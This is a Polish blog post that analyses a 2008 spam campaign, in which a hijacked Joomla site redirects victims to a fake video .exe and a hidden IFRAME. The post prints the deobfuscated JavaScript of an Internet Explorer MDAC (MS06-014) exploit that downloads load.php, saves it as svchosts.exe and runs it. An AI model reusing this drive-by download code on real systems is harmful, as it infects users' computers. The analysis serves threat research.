Wakacje – w zależności od konkretnej osoby – potrafią wygenerować nadmiar dobrze wykonanej pracy lub wręcz przeciwnie – lenistwo i pozbawione jakości wyniki. Postanowiłem sprawdzić jakiej jakości w wakacyjnym czasie urlopów, jest popularne ostatnio przesyłanie w e-mailu linka do strony (zazwyczaj na przejętym serwerze) z fałszywym plikiem video. I dziś się nadarzyła okazja, gdyż do mojej skrzynki (omijając filtr antyspamowy), zawitała wiadomość o takiej treści:
Date: Thu, 14 Aug 2008 05:46:31 +0000
From: fabio khoi <roo@emi.ac.ma>
Subject: sexy songs Gallery for TU_MOJ_LOGINCameron Diaz Kick-up video!!!
Read More
Read More jest oczywiście odnośnikiem do strony. W tym wypadku strony:
hxxp://www.strolchiarms.ch/index1.php
Pod adresem www.strolchiarms.ch znajduje się system CMS Joomla i strona firmy zajmującej się usługami z branży broni sportowej. Plik index1.php został zapewne dodany dla niepoznaki, poprzez wykorzystanie błędu w systemie Joomla lub poprzez odgadnięcie prostego hasła do konta FTP itp.
Odwiedzając stronę index1.php – jesteśmy za pomocą nagłówka Location przekierowywani do strony index6.html na tym samym serwerze WWW. Natomiast sam plik index6.html po pierwsze, za pomocą znacznika META (refresh) po 5 sekundach bezczynności przenosi nas do /videoxxx938.exe (nadal na tym samym serwerze WWW). Oczywiście sama strona index6.html wyświetla także obrazek łudząco podobny do filmów znanych z serwisów takich jak choćby Youtube. Oczywiście klikając w obrazek – otwieramy okno pobierania pliku /videoxxx938.exe.
Jakby tego było mało, otwierane jest okno IFRAME o rozmiarach 1×1 piksel, w którym przeglądarka odwiedza /pindex.php (znów na tym samym serwerze WWW). Próbując połączyć się do pliku pindex.php – spreparowany wynik otrzymamy jedynie w przypadku gdy nasza przeglądarka przedstawia się jako Internet Explorer. W przeciwnym wypadku otrzymujemy pustą stronę. Od razu wiadomo, że strona jest zainteresowana jedynie przeglądarką IE, gdyż wykorzystuje błąd obecny w tejże.
Sama strona zawiera na początku standardową treść obecną w sytuacji, gdy strony nie ma. Jednak wytrawne oko zauważy, że otwierana strona to pindex.php, natomiast komunikat wyglądający na standardowy komunikat błędu serwera WWW – zawiera dane dotyczące index.php.
Dopiero po przyjrzeniu się bliżej kodowi źródłowemu strony, możemy zauważyć, że dodatkowo zawiera ona kod w języku JavaScript, do tego kod zaciemniony, na pierwszy rzut oka niezrozumiały czyli taki, który naszej uwagi nie powinien przykłuwać.
Dopiero po odkodowaniu tekst wygląda prawie jak odkodowany:
poexali();
function poexali() {var ender = document.createElement(’object’);
ender.setAttribute(’id’,’ender’);
ender.setAttribute(’classid’,’c’+’l’+”sid:B”+”D9″+’6C556-65’+”A3-11″
+’D0-983A-0’+”0C”+’04F’+”C29″+’E36′);
try {var asq = ender.CreateObject(’m’+”sx”+’ml2’+”.”+’X’+”ML”+’H’+’TTP’,”);
var ass = ender.CreateObject(„Sh”+”ell.A”+”p”+”plica”+”tion”,”);
var asst = ender.CreateObject(’a’+’d’+”odb.”+’st’+”r”+’eam’,”);
try { asst.type = 1;
asq.open(’G’+”E”+’T’,’http://www.strolchiarms.ch//load.php’,false);
asq.send();
asst.open();
asst.Write(asq.responseBody);
var imya = ’.//..//svchosts.exe’;asst.SaveToFile(imya,2);
asst.Close();
} catch(e) {}try { ass.shellexecute(imya);
} catch(e) {}}catch(e){}}
Bliżej przyglądając się takiemu kodowi możemy zauważyć, że przypomina on exploity wykorzystujące błąd w przeglądarce Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014). Błąd już trochę stary, ale jak widać jary… Pobierany w exploicie link load.php to bliźniaczo podobny plik do pierwszego .exe sprzedawanego nam na głównej stronie (różniący się bodajże nic nie znaczącym bajtem, być może w celu oszukania systemów obronnych bazujących na sumach kontrolnych pliku, choć zapewne tak naprawdę przez przypadek).
Jeśli zaś chodzi o rozpoznawanie pliku .exe przez systemy antywirusowe – serwis VirusTotal wykazuję analizę na poziomie wykrywania w 16 z 36 (44%) silników antywirusowych.
Podsumowując – z mojej perspektywy to chyba z racji wakacji, specjalnie się nie przyłożyli.
– błędna nazwa pliku w fałszywym „Not found”,
– stary bład w IE,
– IFRAME 1×1 widoczny gołym okiem,
– można wielokrotnie pobierać plik z tego samego IP (uprzednio druga próba była blokowana w celu utrudnienia analizy – być może teraz stwierdzili, że i tak nie ma sensu się ukrywać i lepiej próbować zarażać wiele komputerów obecnych za jednym IP),
– brak exploitow dla innych przeglądarek,
– 2 godziny po otrzymaniu maila i pobraniu pliku .exe – 16 systemów antywirusowych wykrywało obecność szkodnika.
Widać wakacje nie sprzyjają wydajnej pracy w tej dziedzinie komputerowego życia…
PS: Tak ku gwoli ścisłości, sprawdziłem swój folder zawierający SPAM pod kątem obecności zwrotu „/index1.php” z ostatnich 4 dni. Naliczyłem się 74 domeny hostujące ten rodzaj malware. Wszędzie ta sama metodologia, z innymi nazwami plików, i (!!!) innymi obrazkami podszywającymi się pod film video. A także z różniącymi się trochę bardziej plikami .exe. Mam tak czy siak wrażenie, że stoi za tym jedna i ta sama grupa :]
PS2: Coś mnie podkusiło i postanowiłem sprawdzić ilość zarażonych domen w mojej skrzynce z ostatnich 45 dni i liczba ich wynosiła: 455 w tym 19 zakończone domeną .pl.